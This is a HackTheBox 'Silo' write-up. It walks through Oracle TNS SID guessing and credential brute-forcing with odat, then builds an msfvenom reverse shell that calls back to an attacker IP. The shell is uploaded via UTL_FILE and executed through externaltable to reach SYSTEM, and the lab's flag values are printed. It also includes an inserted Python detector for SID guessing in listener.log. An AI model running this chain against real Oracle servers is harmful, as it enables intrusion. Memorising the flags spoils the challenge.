HackTheBox Silo

Writeup for HackTheBox Silo

Machine Synopsis

Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially. (Source)

Key exploitation techniques:

  • Oracle TNS listener enumeration (SID guessing)
  • Oracle account brute-forcing
  • Oracle UTL_FILE package abuse for file upload
  • Oracle EXTERNALTABLE for command execution
  • SYSTEM shell

Enumeration

$ nmap -sC -sV -A -p- 10.10.10.82

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 400 Bad Request
|_http-server-header: Oracle XML DB/Oracle Database
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC

The scan identified IIS on port 80, SMB services, and crucially, an Oracle TNS listener on port 1521 and an Oracle XML DB HTTPD on port 8080.

Website

A quick gobuster scan on port 80 yielded no interesting web content beyond /aspnet_client.

$ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt -t 50 
...
/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
...

The focus shifted to the Oracle services.

Exploitation

Oracle Enumeration & RCE (SYSTEM)

The Oracle Database Attack Tool (odat) was used to enumerate the Oracle TNS listener. First, sidguesser identified valid SIDs.

$ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
...
[+] SIDs found on the 10.10.10.82:1521 server: XE
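SID guessing of this kind is visible on the server side: every connect attempt, including ones for SIDs the listener does not know, is written to listener.log with a return code (TNS-12505 when the SID is unknown). The following detection is an added example, not part of the original writeup or of odat; the log lines are constructed for illustration and the threshold is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample of listener.log entries (not from the original writeup).
# Field order: timestamp * CONNECT_DATA * ADDRESS * event * SID * return code.
# Return code 12505 means the listener does not know the requested SID.
SAMPLE_LISTENER_LOG = """\
12-MAR-2024 09:14:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50112)) * establish * ORCL * 12505
12-MAR-2024 09:14:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50113)) * establish * PROD * 12505
12-MAR-2024 09:14:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50114)) * establish * TEST * 12505
12-MAR-2024 09:14:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=50115)) * establish * XE * 0
12-MAR-2024 09:20:45 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=app.exe)(HOST=APPSRV01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.55)(PORT=61002)) * establish * XE * 0
"""

# One listener.log connect entry; CONNECT_DATA is skipped lazily because it nests parentheses.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \* \(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\) \* "
    r"(?P<event>\w+) \* (?P<sid>\S+) \* (?P<rc>\d+)$"
)


def parse_listener_log(text):
    """Return (client_host, requested_sid, return_code) for each 'establish' entry."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("event") == "establish":
            events.append((m.group("host"), m.group("sid"), int(m.group("rc"))))
    return events


def detect_sid_guessing(events, threshold=3):
    """Map client host -> sorted list of unknown SIDs it tried, for hosts whose
    count of distinct TNS-12505 SIDs reaches the threshold (assumed value)."""
    unknown = defaultdict(set)
    for host, sid, rc in events:
        if rc == 12505:
            unknown[host].add(sid)
    return {h: sorted(s) for h, s in unknown.items() if len(s) >= threshold}


if __name__ == "__main__":
    for host, sids in detect_sid_guessing(parse_listener_log(SAMPLE_LISTENER_LOG)).items():
        print(f"possible SID guessing from {host}: {', '.join(sids)}")
```

The legitimate client in the sample connects to a known SID and is not flagged; only the host cycling through unknown SIDs is reported.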

The valid SID XE was found. Next, passwordguesser was used to brute-force credentials for this SID.

$ odat passwordguesser -s 10.10.10.82 -d XE
...
[+] Valid credentials found: scott/tiger. Continue...
...
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger

The credentials scott/tiger were successfully identified.

A Windows reverse shell executable (exploit.exe) was generated using msfvenom.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=1234 -f exe > exploit.exe

odat’s utlfile module was then used to upload exploit.exe to the /temp directory on the remote server. Initial attempts failed due to insufficient privileges.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[-] Impossible to put the /home/shiro/HackTheBox/Silo/exploit.exe file: `ORA-01031: insufficient privileges`

Adding the --sysdba flag to the odat command made the connection AS SYSDBA, which resolved the ORA-01031 permission error.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe --sysdba

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[+] The /home/shiro/HackTheBox/Silo/exploit.exe file was created on the /temp directory on the 10.10.10.82 server like the exploit.exe file

Finally, odat’s externaltable module was used to execute the uploaded exploit.exe. A netcat listener was set up to catch the shell.

# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

# Execute the uploaded binary
$ odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec /temp exploit.exe --sysdba

[1] (10.10.10.82:1521): Execute the exploit.exe command stored in the /temp path

# Reverse shell received
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.82] 49181
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system

This granted a reverse shell as NT AUTHORITY\SYSTEM. The user.txt and root.txt flags were retrieved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>cd C:\Users
C:\Users>type C:\Users\Phineas\Desktop\user.txt
2b431674efbc61c40c4219ca7cd67e3e

C:\Users>type C:\Users\Administrator\Desktop\root.txt
d2df154a2b64a4810b71acdc8b24fd61

This post is licensed under CC BY 4.0 by the author.